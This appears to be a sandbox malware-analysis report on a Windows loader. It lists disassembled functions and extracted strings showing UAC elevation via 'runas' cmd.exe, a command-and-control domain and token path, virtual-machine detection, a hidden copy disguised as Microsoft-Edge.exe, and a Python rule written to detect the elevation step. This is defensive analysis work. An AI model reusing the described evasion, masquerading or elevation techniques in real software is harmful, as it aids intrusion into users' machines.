[Control-flow graph edge list omitted. Blocks 401180-4014a6 call GetStartupInfoA, Sleep, _initterm, SetUnhandledExceptionFilter, malloc, strlen, memcpy and _cexit, and call into 4032e0, 403740, 4041e0, 4030b0, 4042c0, 402c70, 4029e7, 404170, 404180 and 404140.]
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled_cexitmemcpystrlen
                                                                                                                                                                  • String ID: h@
                                                                                                                                                                  • API String ID: 1640792405-485769165
                                                                                                                                                                  • Opcode ID: 39f3e5cf561da997b405f95571c56a3e99b1e2c7bc00c2501b2981bd38061aa7
                                                                                                                                                                  • Instruction ID: 4c29a552a55374966fbeb6cd99cb9045177b543220c5f115e7a68cb18e85450b
                                                                                                                                                                  • Opcode Fuzzy Hash: 39f3e5cf561da997b405f95571c56a3e99b1e2c7bc00c2501b2981bd38061aa7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C7188B570075486EB20AF66E89076A33A1B789B88F44803BDF09B77A1DF3DD854C349

                                                                                                                                                                  Control-flow Graph

[Control-flow graph edge list omitted. Blocks 401e9e-401fdd: ShellExecuteExA at 401f35, with puts and printf error paths at 401f24, 401f7c and 401f8a.]
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • runas, xrefs: 00401EE1
                                                                                                                                                                  • cmd.exe, xrefs: 00401EEF
                                                                                                                                                                  • /c %s, xrefs: 00401F08
                                                                                                                                                                  • Error: Failed to execute command %s with elevated privileges. Error code: %ld, xrefs: 00401F9A
                                                                                                                                                                  • Error: The user refused to allow privileges elevation., xrefs: 00401F7C
                                                                                                                                                                  • Error: Cannot format command line., xrefs: 00401F24
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: puts$ExecuteShell
                                                                                                                                                                  • String ID: /c %s$Error: Cannot format command line.$Error: Failed to execute command %s with elevated privileges. Error code: %ld$Error: The user refused to allow privileges elevation.$cmd.exe$runas
                                                                                                                                                                  • API String ID: 961791793-699271044
                                                                                                                                                                  • Opcode ID: 825dd6dfc1f2c07fb3755769cee10684da71ff619e358bb8e36eeac6c73bb857
                                                                                                                                                                  • Instruction ID: 8cf10ecf543ab77f8754b7e41b8cf71e1f194f8d7f35ca4a7169013fc0aa2929
                                                                                                                                                                  • Opcode Fuzzy Hash: 825dd6dfc1f2c07fb3755769cee10684da71ff619e358bb8e36eeac6c73bb857
                                                                                                                                                                  • Instruction Fuzzy Hash: 34311671310B858AEB61DF26EC443D833A8F788788F800126DB4D6BBA8EF38C645C745
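The strings for the function at 00401e9e show how the sample elevates: ShellExecuteExA with the verb "runas" on "cmd.exe" with parameters "/c %s", and a distinct error message when the user declines the UAC prompt. The observable artefact of a successful call is a cmd.exe running a "/c" command at High integrity whose parent still runs at Medium from a user-writable directory. The detection below is an added example written for this report, not code from the sample or from Joe Sandbox; the event format, field names, paths and command lines are constructed, and it assumes the event source records the requesting process as the parent and carries both integrity levels (Sysmon event 1 does).

```python
"""Flag the integrity-level hop that the loader's elevation routine at 0x00401E9E
leaves behind: ShellExecuteExA("runas", "cmd.exe", "/c <command>").  Event lines,
field names and paths are constructed for this example."""
from dataclasses import dataclass
from typing import Dict, List

LEVEL_RANK = {"Low": 0, "Medium": 1, "High": 2, "System": 3}

# Parent directories from which an elevation request is unusual (assumption).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


@dataclass
class ProcEvent:
    image: str
    command_line: str
    integrity: str
    parent_image: str
    parent_integrity: str


def parse_event(line: str) -> ProcEvent:
    """Parse one 'Key=Value | Key=Value' event line (constructed format)."""
    kv: Dict[str, str] = dict(part.split("=", 1) for part in line.split(" | "))
    return ProcEvent(kv["Image"], kv["CommandLine"], kv["IntegrityLevel"],
                     kv["ParentImage"], kv["ParentIntegrityLevel"])


def is_runas_cmd_hop(ev: ProcEvent) -> bool:
    """True when cmd.exe /c runs at a higher integrity than a parent that lives in a
    user-writable path: the shape a "runas" ShellExecuteExA on cmd.exe produces."""
    if not ev.image.lower().endswith("\\cmd.exe"):
        return False
    # "/c %s" is the parameter string the loader formats; match it as a whole token.
    if "/c" not in ev.command_line.lower().split():
        return False
    if LEVEL_RANK.get(ev.integrity, -1) <= LEVEL_RANK.get(ev.parent_integrity, 99):
        return False
    parent = ev.parent_image.lower()
    return any(marker in parent for marker in USER_WRITABLE)


def find_elevation_hops(lines: List[str]) -> List[ProcEvent]:
    """Return the events that match the runas-to-cmd.exe pattern."""
    return [ev for ev in map(parse_event, lines) if is_runas_cmd_hop(ev)]


# Constructed process-creation events.
SAMPLE_EVENTS = [
    # The loader (Medium, running from the user's temp dir) obtains an elevated cmd.exe.
    "Image=C:\\Windows\\System32\\cmd.exe | CommandLine=\"C:\\Windows\\System32\\cmd.exe\" /c whoami /groups"
    " | IntegrityLevel=High | ParentImage=C:\\Users\\user\\AppData\\Local\\Temp\\file.exe | ParentIntegrityLevel=Medium",
    # Benign: explorer opens a Medium-integrity shell, no hop and no /c.
    "Image=C:\\Windows\\System32\\cmd.exe | CommandLine=\"C:\\Windows\\System32\\cmd.exe\""
    " | IntegrityLevel=Medium | ParentImage=C:\\Windows\\explorer.exe | ParentIntegrityLevel=Medium",
    # Benign: a SYSTEM service runs a command; same integrity on both sides.
    "Image=C:\\Windows\\System32\\cmd.exe | CommandLine=cmd.exe /c schtasks /query"
    " | IntegrityLevel=System | ParentImage=C:\\Windows\\System32\\services.exe | ParentIntegrityLevel=System",
]

if __name__ == "__main__":
    for hit in find_elevation_hops(SAMPLE_EVENTS):
        print(f"runas hop: {hit.parent_image} ({hit.parent_integrity}) -> {hit.command_line} ({hit.integrity})")
```

If the user declines the prompt the sample prints its "refused to allow privileges elevation" message and no cmd.exe child exists, so this rule only sees successful elevations; the consent prompt itself has to be caught from the UAC or consent.exe side.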

                                                                                                                                                                  Control-flow Graph

[Control-flow graph edge list omitted. Blocks 401b3f-401c4a: calls into 404470, 4043c0 and 4043b8, fwrite at 401b96 on the error path, CloseHandle at 401c29.]
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Error create process print., xrefs: 00401BB2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandlefwrite
                                                                                                                                                                  • String ID: Error create process print.
                                                                                                                                                                  • API String ID: 2559456001-1636502906
                                                                                                                                                                  • Opcode ID: 5a356374c23357b474d64b55516b9b8d47a67ff271d39c417316de58009ac1b4
                                                                                                                                                                  • Instruction ID: 160031cb5352d55d0a049487c33501e703d88c20ecdfb6c2b1e18860d78dcea4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a356374c23357b474d64b55516b9b8d47a67ff271d39c417316de58009ac1b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 4921E771750B858DEB209FA6EC543E92365F744798F40013ACB1CABBA9EF38CA45C758

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: strncpy$strstr$QueryValue$CloseOpenatoiprintf
• String ID: Access Denied$Build$CurrentBuildNumber$CurrentBuildNumber: %s$Microsoft Windows 10$Microsoft Windows 11$Microsoft Windows 7$Microsoft Windows 8$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Unknown $Unknown OS$Windows 10$Windows 7$Windows 8$Windows 8.1
• API String ID: 1909651468-1137035884
• Opcode ID: c95b2abfa26f166b1f2152bba86730b1d24aeab912c778476510bdf05de0dbc8
• Instruction ID: a0a231841afb4618f957893a72e215eef219f5a06bdd2ec8c4e5f5f315850866
• Opcode Fuzzy Hash: c95b2abfa26f166b1f2152bba86730b1d24aeab912c778476510bdf05de0dbc8
• Instruction Fuzzy Hash: F3512AB6611B40C8EB14DF6AE88039927A0F7887C8F50512BAF1D67BA9EF78C115C748

Control-flow Graph

APIs
Strings
• Error: cant copy file., xrefs: 00401D44
• File hidden successfully., xrefs: 00401DF7
• File good copied in: %s, xrefs: 00401D5C
• Error: failed to open file for setting attributes., xrefs: 00401E88
• Error: failed to hide file., xrefs: 00401E21
• Error: cant get file path., xrefs: 00401CDF
• Microsoft-Edge.exe, xrefs: 00401CF4
• Error: failed to get file attributes., xrefs: 00401E4B
• Error: cant get file., xrefs: 00401C99
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fwrite
• String ID: Error: cant copy file.$Error: cant get file path.$Error: cant get file.$Error: failed to get file attributes.$Error: failed to hide file.$Error: failed to open file for setting attributes.$File good copied in: %s$File hidden successfully.$Microsoft-Edge.exe
• API String ID: 3559309478-1690969207
• Opcode ID: 31ea6b0e0d4679e6417db61c00c28e6984b6ded537a5ba6343990c85c88e301a
• Instruction ID: 0d97240856d4150d1bbce3dccb48613623e64bff3cac037d7d72e0a46dc880dd
• Opcode Fuzzy Hash: 31ea6b0e0d4679e6417db61c00c28e6984b6ded537a5ba6343990c85c88e301a
• Instruction Fuzzy Hash: BB510FB0310A4489EB60AB66EC547992360F784788F54013BCF1DAB7F5EF7DCA458788

Control-flow Graph

APIs
• puts.MSVCRT ref: 00402A22
• setlocale.MSVCRT ref: 00402A41
• fwrite.MSVCRT ref: 00402A6E
• puts.MSVCRT ref: 00402AA9
  • Part of subcall function 00401C4B: fwrite.MSVCRT ref: 00401CA0
  • Part of subcall function 00402218: GetSystemInfo.KERNEL32 ref: 00402241
  • Part of subcall function 00402218: GlobalMemoryStatusEx.KERNEL32 ref: 0040225E
  • Part of subcall function 00402218: GetComputerNameA.KERNEL32 ref: 004022CA
  • Part of subcall function 00402218: RegOpenKeyExA.KERNEL32 ref: 00402352
  • Part of subcall function 00402218: RegQueryValueExA.KERNEL32 ref: 00402394
  • Part of subcall function 00402218: RegOpenKeyExA.KERNEL32 ref: 0040240F
• printf.MSVCRT ref: 00402AD1
• strlen.MSVCRT ref: 00402AF5
• free.MSVCRT ref: 00402B33
• SleepEx.KERNEL32 ref: 00402B44
Strings
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: Openfwriteputs$ComputerGlobalInfoMemoryNameQuerySleepStatusSystemValuefreeprintfsetlocalestrlen
• String ID: ERROR ENERGY STATUS.$GOOD ENERGY STATUS.$Microsoft-Edge.exe$Need admin privileges. Restarting program...$Russian_Russia.1251
• API String ID: 570618865-2989130530
• Opcode ID: b0c02647733908f3ed43f4b5f4819f6f79cce6fe36d6c900988b42d52a8968dc
• Instruction ID: 188171dc38a9f39a2482fc95cff8ed8cecc5f8f7667dd4d489b5489a0fced0ab
• Opcode Fuzzy Hash: b0c02647733908f3ed43f4b5f4819f6f79cce6fe36d6c900988b42d52a8968dc
• Instruction Fuzzy Hash: 1C314B60310A4595EB20FB66ED593A92365E79478CF80003B9B0E7B3E5EFBCCA45834D

Control-flow Graph

(control-flow graph figure for the function spanning 402760-4029e6; node/edge listing not reproduced)

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: freemalloc
• String ID: /iloverussia.php?token=%S$A WinHTTP Example Program/1.0$Final URL: %s$POST$eijfrhegrtbrfcd.online
• API String ID: 3061335427-2228553089
• Opcode ID: a34cecb6cf9fc084eab04537d76ee1ebedeb2b468dddb7c6cf064be7547877fb
• Instruction ID: 6688591eb75c47117cde76ddf5baa49783db9c5feb2c241f654412f5f19611af
• Opcode Fuzzy Hash: a34cecb6cf9fc084eab04537d76ee1ebedeb2b468dddb7c6cf064be7547877fb
• Instruction Fuzzy Hash: FE511A716017818AEB35DF66E9587DA23A8E344B8CF40112ADA4D6BBD8DFBCC3448744

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 209 402700-402725 call 402607 212 402727-40273a puts call 401e9e 209->212 213 40274d-402754 puts 209->213 216 40273f-40274b free 212->216 215 402759-40275f 213->215 216->215
Strings
• No valid command found in the response., xrefs: 0040274D
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: puts$free
• String ID: No valid command found in the response.
• API String ID: 1067472072-2980825692
• Opcode ID: 645667b51ba4701549f401a65558d81603d224556285689a8e5044f58ad6348f
• Instruction ID: 01383265a2d4681803a4cc4114b267dcea2e7995ebb67f34bdf8582f11d9381d
• Opcode Fuzzy Hash: 645667b51ba4701549f401a65558d81603d224556285689a8e5044f58ad6348f
• Instruction Fuzzy Hash: D1F01276B11B10D8EB00EB72E4493AC2774A75478CF40087A9F5D2B7A9DE78C1958304

Control-flow Graph

APIs
• RtlCaptureContext.KERNEL32 ref: 00402DA4
• RtlLookupFunctionEntry.KERNEL32 ref: 00402DBB
• RtlVirtualUnwind.KERNEL32 ref: 00402DFD
• SetUnhandledExceptionFilter.KERNEL32 ref: 00402E41
• UnhandledExceptionFilter.KERNEL32 ref: 00402E4E
• GetCurrentProcess.KERNEL32 ref: 00402E54
• TerminateProcess.KERNEL32 ref: 00402E62
• abort.MSVCRT ref: 00402E68
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
• String ID:
• API String ID: 4278921479-0
• Opcode ID: 1e2f1e579045fed0aa4db7f78dd159f72cb77928626e21f5b0ebf45983b4390d
• Instruction ID: a2dfb62fcd021635a5e8540deebc9b4d933200af3d90c6d2f8b516aefcd08bee
• Opcode Fuzzy Hash: 1e2f1e579045fed0aa4db7f78dd159f72cb77928626e21f5b0ebf45983b4390d
• Instruction Fuzzy Hash: BA21D0B1611F48E5EB009F65FC8439937A4F708B98F544126DB4E67BA4EF38C165C388
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: freemalloc
• String ID:
• API String ID: 3061335427-0
• Opcode ID: 2aa251e9edd9c8d5ea52c77049717fbe5cf7f3a2dba64fee5e93c9107e4ea0c2
• Instruction ID: c864015200528da4e3a2d7dc0da9566affc9f3e64edacd7b414374e39596ae4e
• Opcode Fuzzy Hash: 2aa251e9edd9c8d5ea52c77049717fbe5cf7f3a2dba64fee5e93c9107e4ea0c2
• Instruction Fuzzy Hash: 49213E36710B4089EB10CB69E45439E37A4F34478CF104526EE9DABBD8DF7DCAA18744
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: malloc
• String ID:
• API String ID: 2803490479-0
• Opcode ID: bf4f274fc83106b92a7499a08eb9e5cf296d111f5af10154b3a0cf0c9927c73c
• Instruction ID: 01c02879a7863bb62acf05a2ef87deb145531d320b57ade11c100b29236f21a1
• Opcode Fuzzy Hash: bf4f274fc83106b92a7499a08eb9e5cf296d111f5af10154b3a0cf0c9927c73c
• Instruction Fuzzy Hash: 99111671B00B0499EB10CB66E85439D27B4F75878CF004476EE5DA7B98DF79C6918348
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4a3982be4225abc516490ced92af6daaa1c1d04572ec27a702a85e770645710
• Instruction ID: dffc5cefb6737f9c2a3fc77ba6fc29a88c26a929add2b396efdfb6a473b8af1d
• Opcode Fuzzy Hash: c4a3982be4225abc516490ced92af6daaa1c1d04572ec27a702a85e770645710
• Instruction Fuzzy Hash: E0113DA27146809DF700CBA5D85434F3BB0A3457ACF044658DF6C6BBE9DB7EC6048B94

Control-flow Graph

Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: printfstrstr$puts
• String ID: HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Model$No 'virt' found in processor name or system model.$Processo$Processor name contains 'virt': %s$ProcessorNameString$System model contains 'virt': %s$SystemProductName$Unknown $Unknown $Virt$virt
• API String ID: 2391528766-1360121679
• Opcode ID: 2926720af0253c7b4b37213cf284bd72808155d13c3d23a0a06b12bc29e88681
• Instruction ID: c84feffc46202db78572020bf7a21f7b525b667a30b23df085d1122e3254eb81
• Opcode Fuzzy Hash: 2926720af0253c7b4b37213cf284bd72808155d13c3d23a0a06b12bc29e88681
• Instruction Fuzzy Hash: 26512DB2311B8498EB20CB66EC407D933A5F748788F80412ADB5D5BBA9EF7DC254C748

Control-flow Graph

APIs
• VirtualProtect.KERNEL32(0040A610,00007FFE2167ADA0,?,?,?,00000001,0040124C), ref: 0040340D
Strings
• Unknown pseudo relocation bit size %d., xrefs: 0040357A
• Unknown pseudo relocation protocol version %d., xrefs: 0040358E
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
• API String ID: 544645111-395989641
• Opcode ID: 8cab94366e6b1b099be5090a741e6956bf18a2ff2f360fa7a3443ac310753d32
                                                                                                                                                                  • Instruction ID: c65ba656f3e0e1fa8ac4f62300e1d393468feefeeb3680ddb040f854185ed496
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cab94366e6b1b099be5090a741e6956bf18a2ff2f360fa7a3443ac310753d32
                                                                                                                                                                  • Instruction Fuzzy Hash: BE9188B1B1024056EB249F76D88071F6B59A7947AAF548837CF09B77D5CE3ECA82830D

Control-flow Graph
control_flow_graph 342 401730-401777 344 401779-40178a puts 342->344 345 40178f-4017d3 342->345 346 40184c-401854 344->346 349 4017d5-4017ed printf 345->349 350 4017ef-4017f6 345->350 349->346 351 4017f9 call 401677 350->351 352 4017fe-401800 351->352 353 401802-401824 printf call 401e9e 352->353 354 401826-401837 printf 352->354 356 40183c-40184a 353->356 354->356 356->350
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: printfputs
• String ID: %TEMP%$%s is running.$%s not found. Skipping launch.$%s not running. Starting...$%s\%s$svhost.exe
• API String ID: 3793801724-2704161499
• Opcode ID: de50e54462b1b5d347b5b87bc864536f09ca71b799e4cf3f7a6df0b898b65601
• Instruction ID: a5489c6963390d0c640a0e435bf09691d47060695afb22ddfe453e79fc2f7c30
• Opcode Fuzzy Hash: de50e54462b1b5d347b5b87bc864536f09ca71b799e4cf3f7a6df0b898b65601
• Instruction Fuzzy Hash: 2B210AB5351A4595EB20EB62EC943E92365E794788F810037CF0E6B7A4EF7CC655C348

Control-flow Graph
control_flow_graph 359 403830-40384b 360 403910-403914 359->360 361 403851-403856 359->361 360->361 364 40391a-403924 360->364 362 4038c0-4038c5 361->362 363 403858-40385d 361->363 367 403980-403990 signal 362->367 368 4038cb 362->368 365 4038db-4038eb signal 363->365 366 40385f-403864 363->366 369 4039d0-4039e4 signal call 4030b0 365->369 370 4038f1-4038f4 365->370 366->364 372 40386a 366->372 367->370 371 403996-4039aa signal 367->371 373 403925-40392a 368->373 374 4038cd-4038d2 368->374 369->364 376 4038a1-4038ab 370->376 377 4038f6-4038fd 370->377 378 403902-403907 371->378 379 403870-403875 372->379 380 403964-403969 372->380 373->364 382 40392c-403931 373->382 374->364 375 4038d4-4038d9 374->375 375->365 375->376 386 4039c1-4039c3 376->386 387 4038b1-4038b8 376->387 377->378 379->364 385 40387b-403880 379->385 383 403937-403947 signal 380->383 384 40396b-403970 380->384 382->376 382->383 392 403a00-403a12 signal 383->392 393 40394d-403950 383->393 384->376 389 403976 384->389 385->376 391 403882-403892 signal 385->391 386->378 387->362 389->364 394 403898-40389b 391->394 395 4039e9-4039fb signal 391->395 392->378 393->376 396 403956-403962 393->396 394->376 397 4039b0-4039bc 394->397 395->378 396->378 397->378
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: signal
• String ID: CCG
• API String ID: 1946981877-1584390748
• Opcode ID: 2be471abf36b6d8511b2256a92b77f3601ae47d48cc5d9b98e98cc4c4400e4b4
• Instruction ID: 3b915e5e6a9bc8df1f710355430a1c215bf775a2e62912b46c024491e7803df1
• Opcode Fuzzy Hash: 2be471abf36b6d8511b2256a92b77f3601ae47d48cc5d9b98e98cc4c4400e4b4
• Instruction Fuzzy Hash: F43181E170150046FE786A7944553360C496BC933AF29CA3BEA6DB73D2CDBC8EC1122E
APIs
• VirtualQuery.KERNEL32(?,?,?,?,?,004070C8,?,?,004070C8,004033D2,0040A610,00007FFE2167ADA0,?,?,?,00000001), ref: 0040318B
Strings
• VirtualProtect failed with code 0x%x, xrefs: 0040326A
